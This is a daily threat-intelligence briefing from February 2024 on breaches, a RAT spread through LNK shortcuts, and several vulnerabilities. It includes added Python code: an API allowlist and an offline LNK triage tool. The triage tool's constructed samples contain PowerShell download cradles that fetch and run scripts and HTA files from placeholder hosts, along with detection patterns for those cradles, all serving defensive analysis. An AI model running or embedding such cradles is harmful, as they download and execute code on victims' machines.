Cyware Daily Threat Intelligence
Daily Threat Briefing • Feb 7, 2024
Canon has patched several critical buffer overflow vulnerabilities in its small office multifunction and laser printers. In other news, Fortinet's FortiSIEM is affected by two maximum-severity vulnerabilities, both allowing unauthenticated remote code execution; further clarification from Fortinet is awaited. An exposed API at the social media platform Spoutible leaked data that could enable account hijacking, including password hashes, 2FA secrets and password reset tokens.
JetBrains TeamCity On-Premises servers face a similar takeover risk from a critical authentication bypass. On the malware side, a RAT is being distributed through shortcut (LNK) files disguised as illegal gambling content.
Dutch military systems compromised by Chinese state hackers
Dutch intelligence agencies revealed that Chinese state-backed hackers breached a Dutch military network in early 2023 by exploiting a zero-day in Fortinet's FortiGate VPN. The attack hit a segmented network with a small number of users and stole user account data from its Active Directory server. Persistence was maintained with Coathanger, a backdoor written specifically for FortiGate appliances. Because the implant survives patching, devices that have since been updated may still be infected; removing it requires reformatting the system.
Verizon privacy breach exposes personal data
Verizon notified more than 63,000 individuals, mostly current employees, of a breach in which an insider accessed personal data without authorization. The incident, attributed to "inadvertent disclosure" and "insider wrongdoing," exposed names, addresses, SSNs, and other sensitive information. An investigation found no indication of malicious intent or of the data being shared outside the company.
Security bug exposes users to account hijacking
A publicly exposed API belonging to the social media platform Spoutible put its users at risk of account hijacking. Security researcher Troy Hunt found that the API returned far more than the public profile: it exposed users' password hashes, 2FA secrets, and password reset tokens. A leaked reset token alone allows an attacker to take over the account, and the platform's weak password policy means many of the hashes could be cracked offline as well.
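The pattern behind this kind of leak is an endpoint that serialises the whole user row instead of the fields the caller is entitled to see. The following is an added example, not Spoutible's code: a profile handler that dumps the record as-is (the bug), a denylist variant that looks safe but is not, and an allowlisted version. The user record, field names and every value in it are constructed for illustration.

```python
"""Added example (not Spoutible's code): excessive data exposure in a profile API
and its allowlisted counterpart. The user row below is constructed; the hash is a
fake bcrypt-shaped string and the TOTP seed is a made-up base32 value."""
import json
import secrets

# Constructed user row: public profile fields sit next to credentials and
# tokens that must never leave the server.
USER_RECORD = {
    "id": 42,
    "handle": "alice",
    "display_name": "Alice",
    "bio": "hello",
    "email": "alice@example.com",
    "password_hash": "$2b$12$" + "x" * 53,
    "totp_secret": "JBSWY3DPEHPK3PXP",
    "reset_token": secrets.token_hex(16),
}

PUBLIC_FIELDS = ("id", "handle", "display_name", "bio")  # anyone may see these
OWNER_FIELDS = ("email",)                                  # only the account owner
NEVER_EXPOSE = ("password_hash", "totp_secret", "reset_token")

# Vulnerable: returns the row as-is, so whatever the database knows, the API tells.
def profile_vulnerable(record):
    return json.dumps(record)

# Also weak: a denylist strips the secrets known today, but a column added later
# (recovery codes, API keys) leaks until someone remembers to extend the list.
def profile_denylist(record):
    return {k: v for k, v in record.items() if k not in NEVER_EXPOSE}

# Hardened: an allowlist. A field reaches the client only if it is named here;
# the owner view adds contact details, never credentials or tokens.
def public_profile(record, viewer_id=None):
    fields = PUBLIC_FIELDS + (OWNER_FIELDS if viewer_id == record["id"] else ())
    return {k: record[k] for k in fields if k in record}

def profile_hardened(record, viewer_id=None):
    return json.dumps(public_profile(record, viewer_id))

# Response check usable from a test suite or an API scanner: which fields that
# must never leave the server are present in a serialised response?
def leaked_fields(response_json):
    body = json.loads(response_json)
    return [f for f in NEVER_EXPOSE if f in body]

if __name__ == "__main__":
    print("vulnerable:", leaked_fields(profile_vulnerable(USER_RECORD)))
    print("hardened:  ", leaked_fields(profile_hardened(USER_RECORD)))
    print("owner view:", public_profile(USER_RECORD, viewer_id=42))
```

The allowlist is the important part: it fails closed when the schema grows, whereas the denylist silently leaks any new sensitive column. The `leaked_fields` check is the kind of assertion worth running against every serialised response in an API test suite.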
RAT disguised as illegal gambling files
AhnLab uncovered a RAT being distributed under the guise of illegal gambling content. The lure is a Windows shortcut (.lnk) whose embedded PowerShell command fetches files from hard-coded URLs; an HTA stage downloaded this way leads to installation of the RAT. The malware's capabilities include keylogging and credential theft, among others.
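Shortcut files of this kind can be triaged offline without executing them, because the PowerShell command line sits in the file as a UTF-16LE string. The following is an added example and not AhnLab's code: it pulls printable strings out of a shortcut's bytes, decodes any `-EncodedCommand` payload, and flags download-cradle indicators and URLs. The three sample shortcuts are constructed here with a simplified layout (only the header and back-to-back strings), and the URLs are placeholders, not indicators from the report.

```python
"""Added example (not AhnLab's code): offline triage of a Windows shortcut (.lnk)
for an embedded PowerShell download cradle. The shortcut bytes are constructed
with a simplified layout and placeholder URLs."""
import base64
import re

# Strings that typically show up in shortcut-launched download cradles.
INDICATORS = re.compile(
    r"powershell|pwsh|mshta|-enc(?:odedcommand)?\b|DownloadString|DownloadFile|"
    r"Invoke-WebRequest|Start-BitsTransfer|https?://",
    re.IGNORECASE,
)
URL_RE = re.compile(r"""https?://[^\s'"<>()]+""", re.IGNORECASE)
# -e / -enc / -EncodedCommand takes base64 of a UTF-16LE script.
ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

def extract_strings(blob, min_len=8):
    """Printable ASCII and UTF-16LE runs of at least min_len characters."""
    ascii_re = rb"[\x20-\x7e]{%d,}" % min_len
    wide_re = rb"(?:[\x20-\x7e]\x00){%d,}" % min_len
    out = [m.group().decode("ascii") for m in re.finditer(ascii_re, blob)]
    out += [m.group().decode("utf-16le") for m in re.finditer(wide_re, blob)]
    return out

def decode_encoded_commands(text):
    """Recover scripts passed via -EncodedCommand (base64 of UTF-16LE)."""
    decoded = []
    for m in ENC_RE.finditer(text):
        try:
            decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-16le"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded

def triage_lnk(blob):
    """Verdict dict: is it a shortcut, which strings look like a cradle, which URLs."""
    hits, urls = [], set()
    for s in extract_strings(blob):
        for text in [s] + decode_encoded_commands(s):
            if INDICATORS.search(text):
                hits.append(text)
                urls.update(URL_RE.findall(text))
    return {
        "is_lnk": blob[:4] == b"\x4c\x00\x00\x00",
        "suspicious": bool(hits),
        "strings": hits,
        "urls": sorted(urls),
    }

# --- constructed samples (not real malware) ---------------------------------
# Real .lnk files start with HeaderSize 0x4C and the ShellLink CLSID; the rest
# of the structure is elided here and the strings are laid out back to back.
LNK_HEADER = b"\x4c\x00\x00\x00" + bytes.fromhex("0114020000000000c000000000000046") + b"\x00" * 56

def _wide(s):
    return s.encode("utf-16le") + b"\x00\x00"

CRADLE_PLAIN = LNK_HEADER + _wide(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe") + _wide(
    "-w hidden -nop -c \"(New-Object Net.WebClient).DownloadFile("
    "'http://example.invalid/game.hta','g.hta');mshta g.hta\""
)
_script = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
CRADLE_ENCODED = LNK_HEADER + _wide("powershell.exe") + _wide(
    "-nop -w hidden -enc " + base64.b64encode(_script.encode("utf-16le")).decode()
)
BENIGN = LNK_HEADER + _wide(r"C:\Program Files\Notepad++\notepad++.exe") + _wide("readme.txt")

if __name__ == "__main__":
    for name, sample in (("plain", CRADLE_PLAIN), ("encoded", CRADLE_ENCODED), ("benign", BENIGN)):
        v = triage_lnk(sample)
        print(f"{name}: suspicious={v['suspicious']} urls={v['urls']}")
```

On a real sample, run `triage_lnk(open(path, "rb").read())`; the string extraction is deliberately layout-agnostic, so it also works when the command line is hidden behind a long run of padding in the shortcut's argument field.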
Canon printers receive security updates
Canon released firmware updates to patch seven critical-severity flaws in various small office printer models. The bugs are buffer overflows reachable over the network and could lead to RCE or DoS. Affected components include PDL resource download, password processing, and probe request handling. Firmware versions 03.07 and earlier are vulnerable on models such as the i-SENSYS LBP673Cdw and imageCLASS MF753CDW. Canon reports no known exploitation so far.
Azure HDInsight services vulnerable to attacks
Three security vulnerabilities have been uncovered in Azure HDInsight's Apache Hadoop, Kafka, and Spark services, allowing privilege escalation and DoS. The flaws (CVE-2023-36419, CVE-2023-38156, and a ReDoS vulnerability) require an authenticated user, who could then gain cluster administrator privileges or disrupt cluster operations. Microsoft released fixes following disclosure by Orca Security researchers.
RCE bugs found in FortiSIEM
Fortinet's FortiSIEM product is affected by two maximum-severity flaws (CVSS 10.0), CVE-2024-23108 and CVE-2024-23109, both allowing RCE. They let an unauthenticated attacker execute unauthorized commands via specially crafted API requests. Fortinet's advisory links them to an older issue, but recent updates suggest they also affect newer FortiSIEM versions. Further clarification from Fortinet is awaited.
Authentication bypass bug threatens on-premise servers
JetBrains issued an urgent warning for TeamCity On-Premises users to patch a critical authentication bypass, CVE-2024-23917, affecting versions 2017.1 through 2023.11.2. The flaw can be exploited for RCE without user interaction and so amounts to a full server takeover. The company advises updating immediately, or temporarily isolating internet-exposed servers until they can be patched. With more than 2,000 servers exposed online, the threat remains significant.
Code execution threat hovers over Chrome
Multiple vulnerabilities were fixed in Google Chrome, including a use-after-free in Mojo and a heap buffer overflow in Skia. These could allow an attacker to execute arbitrary code in the context of the logged-in user and, depending on that user's privileges, install programs, manipulate data, or create new accounts. There are no known instances of exploitation in the wild; updates have been issued for Windows, Mac, and Linux.
High-severity flaw in Linux shim
A high-severity vulnerability has been reported in shim, the bootloader Linux distributions use for UEFI Secure Boot, which could permit the installation of boot-level malware. Tracked as CVE-2023-40547, the buffer overflow lets an attacker execute malicious code early in the boot process, before the kernel loads, bypassing Secure Boot protections. Exploitation requires specific conditions, such as the system booting over HTTP from a server the attacker controls or can intercept, but the risk is significant because malware planted at this stage persists across operating system reinstalls.